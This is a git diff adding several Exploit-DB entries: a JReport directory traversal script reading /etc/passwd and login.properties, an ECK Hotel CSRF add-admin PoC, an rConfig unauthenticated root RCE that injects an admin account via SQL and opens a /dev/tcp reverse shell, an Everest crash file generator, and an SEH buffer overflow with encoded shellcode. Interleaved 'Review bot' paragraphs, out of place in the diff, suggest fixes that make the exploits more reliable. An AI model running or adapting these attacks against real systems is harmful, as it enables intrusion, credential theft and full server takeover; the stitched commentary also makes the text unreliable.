diff --git a/exploits/java/webapps/48260.py b/exploits/java/webapps/48260.py
new file mode 100755
index 000000000..bef4af3a7
--- /dev/null
+++ b/exploits/java/webapps/48260.py
@@ -0,0 +1,91 @@ +# Exploit Title: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal +# Date: 2020-03-26 +# Exploit Author: hongphukt +# Vendor Homepage: https://www.jinfonet.com/ +# Software Link: https://www.jinfonet.com/product/download-jreport/ +# Version: JReport 15.6 +# Tested on: Linux, Windows + +Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems. +Technical Details + +Jreport before loggedin have help function with url: + +https://serverip/jreport/sendfile/help/userguide/server/index.htm + +senfile url processing by jet.server.servlets.SendFileServlet class. + + + + sendfile + + jet.server.servlets.SendFileServlet + + + + + + sendfile + + /sendfile/* + + + + + +In jet.server.servlets.SendFileServlet class, request will go on when it’s authenticated or start url by ‘/help/’ + +if ((!isAuthentic) && + + (!path.startsWith("/help/"))) + + { + + httpRptServer.getHttpUserSessionManager().sendUnauthorizedResponse(req, res, this.D, httpRptServer.getResourceManager().getRealm()); + + return; + + } + + + +So the function reading file without any path validation + +Exploit: + +Get login properties, /etc/password file by get url: + + http://jreport.test/jreport/sendfile/help/../bin/login.properties + + http://jreport.test/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd + +# Exploit Code + +import requests +import argparse + +def exploit(url, file): + + session = requests.Session() + rawBody = "\r\n" + response = session.get("{}/jreport/sendfile/help/{}".format(url,file), data=rawBody) + + if response.status_code == 404: + print("The '{}' file was not found.".format(file)) + else: + print("-" *22) + print(response.content) + print("-" *22) + +if __name__ == "__main__": + + parser = 
argparse.ArgumentParser(description='Jreport Path traversal & Arbitrary File Download') + parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL') + parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download') + args = parser.parse_args() + + exploit(args.url, args.file) + +# python jreport_fileread.py -u http://jreport.address -f "../../../../../../../../../../../../../../etc/passwd/" +# python jreport_fileread.py -u http://jreport.address -f "../bin/login.properties" +# python jreport_fileread.py -u http://jreport.address -f "../bin/server.properties" \ No newline at end of file diff --git a/exploits/php/webapps/48258.txt b/exploits/php/webapps/48258.txt new file mode 100644 index 000000000..240042fec --- /dev/null +++ b/exploits/php/webapps/48258.txt @@ -0,0 +1,27 @@ +# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin) +# Product : ECK Hotel +# Version : 1.0-beta +# Date: 2020-03-26 +# Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download +# Exploit Author: Mustafa Emre Gül +# Website: https://emregul.com.tr/ +# Tested On : Win10 x64 +# Description : Simple Hotel Management System. + + +PoC: + + + +
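Review bot: The advisory prose between the header comments and `# Exploit Code` (`Jreport Help function have a path traversal ...`, the web.xml fragment, the Java `if ((!isAuthentic) && ...` snippet) is not commented out, so the module raises a SyntaxError before `def exploit` is ever compiled; prefix those lines with `#` or wrap them in a module docstring. Inside `exploit`, `session.get(..., data=rawBody)` attaches a body to a GET that the servlet never reads, and the request carries no `timeout=` and no `except requests.RequestException`, so an unreachable host ends in a traceback instead of a message; `response = session.get("{}/jreport/sendfile/help/{}".format(url, file), timeout=10)` inside a `try` is the minimal fix. The quoted servlet code also documents the root cause worth stating in the header: the `path.startsWith("/help/")` authorization check is evaluated on the un-normalized path, so the vendor-side fix is to canonicalize the path (resolve `..`) before the prefix comparison, and requests matching `/sendfile/help/../` are the pattern for defenders to alert on in access logs.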
+ + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48261.py b/exploits/php/webapps/48261.py new file mode 100755 index 000000000..77f09a205 --- /dev/null +++ b/exploits/php/webapps/48261.py 
@@ -0,0 +1,115 @@ +# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution +# Exploit Author: vikingfr +# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com) +# Date: 2020-03-12 +# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220 +# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py +# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) +# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip +# Install scripts : +# https://www.rconfig.com/downloads/scripts/install_rConfig.sh +# https://www.rconfig.com/downloads/scripts/centos7_install.sh +# https://www.rconfig.com/downloads/scripts/centos6_install.sh +# Version: tested v3.9.4 +# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 +# +# Notes : If you want to reproduce in your lab environment follow those links : +# http://help.rconfig.com/gettingstarted/installation +# then +# http://help.rconfig.com/gettingstarted/postinstall +# +# Example : +# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334 +# rConfig - 3.9 - Unauthenticated root RCE +# [+] Adding a temporary admin user... +# [+] Authenticating as dywzxuvbah... +# [+] Logged in successfully, triggering the payload... +# [+] Check your listener ! +# [+] The reverse shell seems to be opened :-) +# [+] Removing the temporary admin user... +# [+] Done. +# +# $ nc -nvlp 3334 +# listening on [any] 3334 ... 
+# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186 +# sh: no job control in this shell +# sh-4.2# id +# id +# uid=0(root) gid=0(root) groups=0(root) +# sh-4.2# + +#!/usr/bin/python3 +import requests +import sys +import urllib.parse +import string +import random +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +from requests.exceptions import Timeout + +print ("rConfig - 3.9 - Unauthenticated root RCE") + +if len(sys.argv) != 4: + print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort") + exit() + +target = sys.argv[1] +ip = sys.argv[2] +port = sys.argv[3] + +vuln_page="/commands.inc.php" +vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command" +def generateUsername(stringLength=8): + u= string.ascii_lowercase + return ''.join(random.sample(u,stringLength)) + +print ("[+] Adding a temporary admin user...") +fake_id = str(random.randint(200,900)) +fake_user = generateUsername(10) +fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin' +fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d" +userleveladmin = 9 # Administrator +addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--" +encoded_request = target+vuln_page+vuln_parameters+addUserPayload +firstrequest = requests.session() +exploit_req = firstrequest.get(encoded_request,verify=False) + +request = requests.session() +login_info = { + "user": fake_user, + "pass": "admin", + "sublogin": 1 +} +print ("[+] Authenticating as "+fake_user+"...") +login_request = request.post( + target+"/lib/crud/userprocess.php", + login_info, + verify=False, + allow_redirects=True + ) + +dashboard_request = 
request.get(target+"/dashboard.php", allow_redirects=False) + +payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port) +if dashboard_request.status_code == 200: + print ("[+] Logged in successfully, triggering the payload...") + encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload)) + print ("[+] Check your listener !") + try: + exploit_req = request.get(encoded_request,timeout=10) + except Timeout: + print('[+] The reverse shell seems to be opened :-)') + else: + print('[-] The command was not executed by the target or you forgot to open a listener...') + +elif dashboard_request.status_code == 302: + print ("[-] Wrong credentials !? Maybe admin were not added...") + exit() + +print("[+] Removing the temporary admin user...") +delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--" +encoded_request = target+vuln_page+vuln_parameters+delUserPayload +lastrequest = requests.session() +exploit_req = lastrequest.get(encoded_request,verify=False) +print ("[+] Done.") \ No newline at end of file diff --git a/exploits/windows/dos/48259.py b/exploits/windows/dos/48259.py new file mode 100755 index 000000000..8adc0c170 --- /dev/null +++ b/exploits/windows/dos/48259.py 
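Review bot: The temporary admin row created by the INSERT at the top of the script is only removed on the fall-through path; the `exit()` in the `elif dashboard_request.status_code == 302:` branch and any exception other than `Timeout` from `request.get(encoded_request,timeout=10)` (a connection error, for instance) skip the DELETE entirely and leave a privileged account on the system under test. Wrapping everything after the INSERT in a `try:` whose `finally:` holds the `delUserPayload` request makes the cleanup unconditional, and the error exit should be `sys.exit(1)` rather than the site-module `exit()`, which is not guaranteed to exist outside an interactive interpreter. The `#!/usr/bin/python3` line sits after roughly forty comment lines instead of on line 1, so it is not honored as a shebang. For defenders, note that both the INSERT and the DELETE travel in the query string of a GET to `/commands.inc.php` and are therefore recorded verbatim in the web server access log, and that the root-level step is the `sudo zip ... -TT` invocation, which a sudoers rule that does not grant unrestricted `zip` removes.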
@@ -0,0 +1,21 @@
+# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2020-03-24
+# Software Link : http://www.lavalys.com/
+# Tested Version: 5.50.2100
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Home Single Language
+
+# Steps to produce the crash:
+#1.- Run python code: Everest.py
+#2.- Open Everest.txt and copy content to clipboard
+#3.- Open "Everest Ultimate Edition"
+#4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo"
+#5.- In "Abrir Archivo" field paste Clipboard
+#6.- Select "Next"
+#7.- Crashed
+
+buffer = "\x41" * 450
+f = open ("Everest.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48257.py b/exploits/windows/local/48257.py
new file mode 100755
index 000000000..f355d8d4d
--- /dev/null
+++ b/exploits/windows/local/48257.py
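Review bot: The file write at the end of the script is a bare `open`/`write`/`close` sequence, so an exception raised by `f.write` leaves the handle open; the idiomatic form is `with open("Everest.txt", "w") as f:` followed by `    f.write(buffer)`, which also makes the explicit `f.close()` unnecessary. A short comment above `buffer = "\x41" * 450` such as `# 450-byte 'A' string pasted into the 'Open File' field in the steps above` would record what the constant is for, since nothing else in the file explains it. The numbered steps use `#1.-` without a space after `#`, unlike the header comments; `# 1.-` keeps the comment style uniform.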
@@ -0,0 +1,76 @@ +# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH) +# Date: 2020-03-26 +# Author: Felipe Winsnes +# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe +# Version: 2.7.3.700 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "poc.txt" +# 2.- Copy the content of the new file 'poc.txt' to clipboard +# 3.- Open the Application +# 4.- If the 'Preferences' windows pops up, just click 'Cancel' +# 4.- Click 'Batch' +# 5.- Delete everything on the parameter 'Input:' and paste the clipboard there +# 6.- Select OK +# 7.- Some Windows message boxes will pop up, click OK. +# 8.- Profit + +# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/ + +import struct +import sys + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 447 bytes + +buf = b"" +buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37" +buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" +buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" +buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52" +buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65" +buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b" +buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72" +buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61" +buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66" +buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47" +buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72" +buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31" +buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e" +buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59" +buf += 
b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c" +buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71" +buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33" +buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d" +buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74" +buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b" +buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75" +buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64" +buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53" +buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b" +buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c" +buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30" +buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58" +buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58" +buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45" +buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70" +buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62" +buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53" +buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75" +buf += b"\x35\x57\x70\x41\x41" + +nseh = struct.pack("